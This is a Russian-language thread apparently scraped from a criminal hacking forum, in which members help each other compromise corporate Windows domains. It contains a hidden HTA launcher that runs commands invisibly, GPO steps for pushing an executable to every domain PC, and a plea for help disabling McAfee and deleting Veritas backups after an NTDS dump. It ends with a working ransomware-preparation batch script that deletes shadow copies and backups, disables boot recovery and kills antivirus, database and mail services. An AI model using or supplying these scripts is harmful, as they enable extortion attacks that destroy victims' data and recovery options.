как гарантированно запустить батник или файл с правами админа с wmiexec или автозагрузкой? скрытно от пользователя
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[net-hacking] Вопросы по сетям
- Автор темы iron
- Дата начала
-
- Теги
- network-hacking
Сегодня тоже думал об этом,пока вариант запускать hta, немного поправишь под себя
Код:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><script language="VBScript">
window.moveTo -4000, -4000
Set ht0he1ZRt = CreateObject("Wscript.Shell")
Set svP = CreateObject("Scripting.FileSystemObject")
For each path in Split(ht0he1ZRt.ExpandEnvironmentStrings("%PSModulePath%"),";")
If svP.FileExists(path + "\..\powershell.exe") Then
ht0he1ZRt.Run "command",0
Exit For
End If
Next
window.close()
</script>
</head><body></body></html>Как убить checkpoint endpoint security? Gmer и тд палятся
На пассе или не дает удалить по рдп? Какая версия
Последнее редактирование:
Пароль на удаление.Версия E86.01(86.01.1005)
как через гпо запустить ехе во всех доменных пк ? делал по мануалам, что то не получается.
Код:
открываешь Group policy management на domain controller
Forest: -> Domains -> your.domain -> райтклик Group Policy Objects -> New
Name: любое
Source starter GPO: none (default)
райтклик на созданную гпо, - > Edit
User Configuration -> Preferences -> Control Panel Settings -> Scheduled Task
На вкладке General tab,
- Action - Create.
- Name - Enter a name to this task.
- Run only when the user is logged on - Optional.
На вкладке Action , клик на New
- Action - Start a program.
- Program/Script - Enter the desired command or script.
- Add arguments - Enter the command arguments.
В окне Group policy management райтклик на your.domain -> Link a existing GPO -> выбираем наше созданное гпо и нажимаем ок
открываем шел и прописываем
gpupdate /forceМожно через CMD провернуть?
Реестр чекал на исключения? Мне кажется я грохал какой-то кривой русской тулзой checkpoint (через яндекс нашел), но до конца не убивался, ребутил процессы, но оперативно давал запустить powertool, где добить получилось
psexec под ДА
Ты бы оставил последний октет мак адресов, чтобы понять, где адреса одинаковые, а где нет.
Если тот интерфейс с кучей статических арпов это интерфейс впна, то это такой способ заворачивания трафика до нужных хостов через нужные мидлбоксы.
Сначала выдвигаешь гипотезу о том, какая адресация в сети. Затем подтверждаешь ее или опровергаешь попыткой доступа до нескольких хостов. И затем начинаешь масштабное сканирование в нужном диапазоне.
Сокс прокидывает только TCP соединения или UDP потоки, поэтому надежнее всего TCP connection scan. Порт выбери какой-то который может быть доступен локальной тачке - самба, ад, веб, телнет/ссш, снмп и так далее.
Верно, поэтому хороший наставник на вес золота. Хотя его не так легко найти. Это древняя нерешенная проблема человечества. Ученик не может оценить качества наставника, потому что вообще не понимает сути процессов, и идет за громким именем или яркой оберткой.
не пояснишь что тут менять на свое?
есть еще варианты?
а кто нить пользуется кейлогером лигитимным каким нить? или есть опыт? что б в автозагрузку норм вписалось и не палилось? вон например куча софта ) https://www.keyloggers.com/ru/
Как победить McAfee\Endpoint Security ?
как делаешь? через iptables или какие то софтины есть?
Всем привет.Чисто в теоретических целях
Данные с ADrecon
Есть сетка АД, в ней чисто сервера на винде по диапазону 202.10.100.1/24 на ней чисто серверная винда
2 DC ,файловые сервера,почта и тд
Есть диапазоны на которых винда 7/10
10.0.6.1/24
192.1.0.1/24
Всего хостов 34
По юзерам 290
Получил ДА, сделал дамп NTDS
АВ на сервах McAfee\Endpoint Security
Бэкапы Veritas
Так же прикручен Azure AD.
В нем 128 девайсов
По юзерам 305 штук
Нашел пару акков azure,права member
Сделал выгрузку через MicroBurst
Сдампил с одного DC юзера
MSOL_1234213232b@domain.onmicrosoft.com
c сложным паролем
Подскажите как теоритически довести до финала эту сеть.
Пока вопросы
1)Что за подсети
10.0.6.1/24
192.1.0.1/24
arp scan ненаходит хосты в них.Еще есть VPN в этой сетки?Как проверить ?.......
2)Как отключить McAfee\Endpoint Security
3)Как отключить и удалить бэкапы Veritas
4)Что делать с Azure ?Инфы по ней мало, пока только есть юзеракки, нужно ли искать админа Azure и как это делать?
Сетка по ревеню неплохая, обязательно отблагодарю в случае успеха всех неравнодушных.
Данные с ADrecon
Есть сетка АД, в ней чисто сервера на винде по диапазону 202.10.100.1/24 на ней чисто серверная винда
2 DC ,файловые сервера,почта и тд
Есть диапазоны на которых винда 7/10
10.0.6.1/24
192.1.0.1/24
Всего хостов 34
По юзерам 290
Получил ДА, сделал дамп NTDS
АВ на сервах McAfee\Endpoint Security
Бэкапы Veritas
Так же прикручен Azure AD.
В нем 128 девайсов
По юзерам 305 штук
Нашел пару акков azure,права member
Сделал выгрузку через MicroBurst
Сдампил с одного DC юзера
MSOL_1234213232b@domain.onmicrosoft.com
c сложным паролем
Подскажите как теоритически довести до финала эту сеть.
Пока вопросы
1)Что за подсети
10.0.6.1/24
192.1.0.1/24
arp scan ненаходит хосты в них.Еще есть VPN в этой сетки?Как проверить ?.......
2)Как отключить McAfee\Endpoint Security
3)Как отключить и удалить бэкапы Veritas
4)Что делать с Azure ?Инфы по ней мало, пока только есть юзеракки, нужно ли искать админа Azure и как это делать?
Сетка по ревеню неплохая, обязательно отблагодарю в случае успеха всех неравнодушных.
Азурку бекапы тут обсуждали, может что-то полезное найдешь http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/69565/
У тебя доступ в сеть через VPN клиента? Есть рутовый/админский доступ на сетевые железки (роутер, впн-терминатор), если да, то на них и глянь, что за сети (по дескрипшенам интерфейсов), там же глянь арп таблицы.
глянь бекапы менеджеров паролей
Как провернуть такую инструкцию через CMD или Powershell подскажите пожалуйста.Дабы не тянуть на ДЦ РДП/Ammy/VNC и тд.Хотя бы какой софт/скрипт использовать ...В гугле нашел ПШ и СМД только для локал шелдуда
Я вот ищу книгу для более подробного изучения как pentest'а в целом
И натыкаюсь на везде одинаковый топ :https://www.ceos3c.com/security/the-best-hacking-books/
+- одно и тоже везде)
И я вроде выбрал Питера Кима, но у него несколько книг и если кто-то изучал его творчество, то прошу помочь!
Эти части независимо от друг друга и просто дополняются новой информацией и убирается лишняя?
Или там все зависит и надо читать поочередно?
Если Вы знаете ещё какие-нибудь источники, то напишите их
И натыкаюсь на везде одинаковый топ :https://www.ceos3c.com/security/the-best-hacking-books/
+- одно и тоже везде)
И я вроде выбрал Питера Кима, но у него несколько книг и если кто-то изучал его творчество, то прошу помочь!
Эти части независимо от друг друга и просто дополняются новой информацией и убирается лишняя?
Или там все зависит и надо читать поочередно?
Если Вы знаете ещё какие-нибудь источники, то напишите их
Стоит ли удалять бэкапы создавая таск для компов на PDC с батником (закинул в C:\WINDOWS\sysvol\sysvol\domain\scripts\sys.bat), да сделал таск.А за ним аналогичный таск для запуска другого софта.
А так же останавливать сервисы.Или это очень грубо и палевно?
Код:
wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
wbadmin DELETE BACKUP -keepVersions:0
wmic SHADOWCOPY DELETE
vssadmin Delete Shadows /All /Quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin list shadowsА так же останавливать сервисы.Или это очень грубо и палевно?
Код:
@echo off
rem Delite Service "Hyper-V"
sc delete "vmickvpexchange"
sc delete "vmicguestinterface"
sc delete "vmicshutdown"
sc delete "vmicheartbeat"
sc delete "vmicrdv"
sc delete "storflt"
sc delete "vmictimesync"
sc delete "vmicvss"
sc delete "hvdsvc"
sc delete "nvspwmi"
sc delete "wmms"
rem Delite Service "AVG"
sc delete "AvgAdminServer"
sc delete "AVG Antivirus"
sc delete "avgAdminClient"
rem Delite Service "Sofos"
sc delete "SAVService"
sc delete "SAVAdminService"
sc delete "Sophos AutoUpdate Service"
sc delete "Sophos Clean Service"
sc delete "Sophos Device Control Service"
sc delete "Sophos Endpoint Defense Service"
sc delete "Sophos File Scanner Service"
sc delete "Sophos Health Service"
sc delete "Sophos MCS Agent"
sc delete "Sophos MCS Client"
sc delete "SntpService"
sc delete "swc_service"
sc delete "swi_service"
sc delete "Sophos UI"
sc delete "swi_update"
sc delete "Sophos Web Control Service"
sc delete "Sophos System Protection Service"
sc delete "Sophos Safestore Service"
sc delete "hmpalertsvc"
sc delete "RpcEptMapper"
sc delete "Sophos Endpoint Defense Service"
sc delete "SophosFIM"
sc delete "swi_filter"
rem Delite Service "Fire_Bird"
sc delete "FirebirdGuardianDefaultInstance"
sc delete "FirebirdServerDefaultInstance"
rem Delite Service "SQL"
sc delete "MSSQLFDLauncher"
sc delete "MSSQLSERVER"
sc delete "SQLSERVERAGENT"
sc delete "SQLBrowser"
sc delete "SQLTELEMETRY"
sc delete "MsDtsServer130"
sc delete "SSISTELEMETRY130"
sc delete "SQLWriter"
sc delete "MSSQL$VEEAMSQL2012"
sc delete "SQLAgent$VEEAMSQL2012"
sc delete "MSSQL"
sc delete "SQLAgent"
sc delete "MSSQLServerADHelper100"
sc delete "MSSQLServerOLAPService"
sc delete "MsDtsServer100"
sc delete "ReportServer"
sc delete "SQLTELEMETRY$HL"
sc delete "TMBMServer"
sc delete "MSSQL$PROGID"
sc delete "MSSQL$WOLTERSKLUWER"
sc delete "SQLAgent$PROGID"
sc delete "SQLAgent$WOLTERSKLUWER"
sc delete "MSSQLFDLauncher$OPTIMA"
sc delete "MSSQL$OPTIMA"
sc delete "SQLAgent$OPTIMA"
sc delete "ReportServer$OPTIMA"
sc delete "msftesql$SQLEXPRESS"
sc delete "postgresql-x64-9.4"
rem Delite Service "AV: Webroot"
sc delete "WRSVC"
rem Delite Service "AV: ESET"
sc delete "ekrn"
sc delete "ekrnEpsw"
rem Delite Service "AV: Kaspersky"
sc delete "klim6"
sc delete "AVP18.0.0"
sc delete "KLIF"
sc delete "klpd"
sc delete "klflt"
sc delete "klbackupdisk"
sc delete "klbackupflt"
sc delete "klkbdflt"
sc delete "klmouflt"
sc delete "klhk"
sc delete "KSDE1.0.0"
sc delete "kltap"
rem Delite Service "AV: Quick Heal"
sc delete "ScSecSvc"
sc delete "Core Mail Protection"
sc delete "Core Scanning Server"
sc delete "Core Scanning ServerEx"
sc delete "Online Protection System"
sc delete "RepairService"
sc delete "Core Browsing Protection"
sc delete "Quick Update Service"
rem Delite Service "AV: McAfee"
sc delete "McAfeeFramework"
sc delete "macmnsvc"
sc delete "masvc"
sc delete "mfemms"
sc delete "mfevtp"
rem Delite Service "AV: Trend Micro"
sc delete "TmFilter"
sc delete "TMLWCSService"
sc delete "tmusa"
sc delete "TmPreFilter"
sc delete "TMSmartRelayService"
sc delete "TMiCRCScanService"
sc delete "VSApiNt"
sc delete "TmCCSF"
sc delete "tmlisten"
sc delete "TmProxy"
sc delete "ntrtscan"
sc delete "ofcservice"
sc delete "TmPfw"
sc delete "PccNTUpd"
rem Delite Service "AV: Panda"
sc delete "PandaAetherAgent"
sc delete "PSUAService"
sc delete "NanoServiceMain"
rem Delite Service "AV: Panda"
sc delete "EPIntegrationService"
sc delete "EPProtectedService"
sc delete "EPRedline"
sc delete "EPSecurityService"
sc delete "EPUpdateService"
rem Kill
sc delete "UniFi"
rem Kill "AV: Trend Micro"
taskkill -f -im PccNTMon.exe
taskkill -f -im NTRtScan.exe
taskkill -f -im TmListen.exe
taskkill -f -im TmCCSF.exe
taskkill -f -im TmProxy.exe
taskkill -f -im TMBMSRV.exe
taskkill -f -im TMBMSRV.exe
taskkill -f -im TmPfw.exe
taskkill -f -im CNTAoSMgr.exe
rem Kill "SQL"
taskkill -f -im sqlbrowser.exe
taskkill -f -im sqlwriter.exe
taskkill -f -im sqlservr.exe
taskkill -f -im msmdsrv.exe
taskkill -f -im MsDtsSrvr.exe
taskkill -f -im sqlceip.exe
taskkill -f -im fdlauncher.exe
taskkill -f -im Ssms.exe
taskkill -f -im SQLAGENT.EXE
taskkill -f -im fdhost.exe
taskkill -f -im fdlauncher.exe
taskkill -f -im sqlservr.exe
taskkill -f -im ReportingServicesService.exe
taskkill -f -im msftesql.exe
taskkill -f -im pg_ctl.exe
taskkill -f -im postgres.exe
net stop MSSQLServerADHelper100
net stop MSSQL$ISARS
net stop MSSQL$MSFW
net stop SQLAgent$ISARS
net stop SQLAgent$MSFW
net stop SQLBrowser
net stop ReportServer$ISARS
net stop SQLWriter
net stop WinDefend
net stop mr2kserv
net stop MSExchangeADTopology
net stop MSExchangeFBA
net stop MSExchangeIS
net stop MSExchangeSA
net stop ShadowProtectSvc
net stop SPAdminV4
net stop SPTimerV4
net stop SPTraceV4
net stop SPUserCodeV4
net stop SPWriterV4
net stop SPSearch4
net stop MSSQLServerADHelper100
net stop IISADMIN
net stop firebirdguardiandefaultinstance
net stop ibmiasrw
net stop QBCFMonitorService
net stop QBVSS
net stop QBPOSDBServiceV12
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
net stop IISADMIN
net stop "Simply Accounting Database Connection Manager"
net stop QuickBooksDB1
net stop QuickBooksDB2
net stop QuickBooksDB3
net stop QuickBooksDB4
net stop QuickBooksDB5
rem Kill
taskkill -f -im UniFi.exe
Echo TIME TO FIND AV
tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"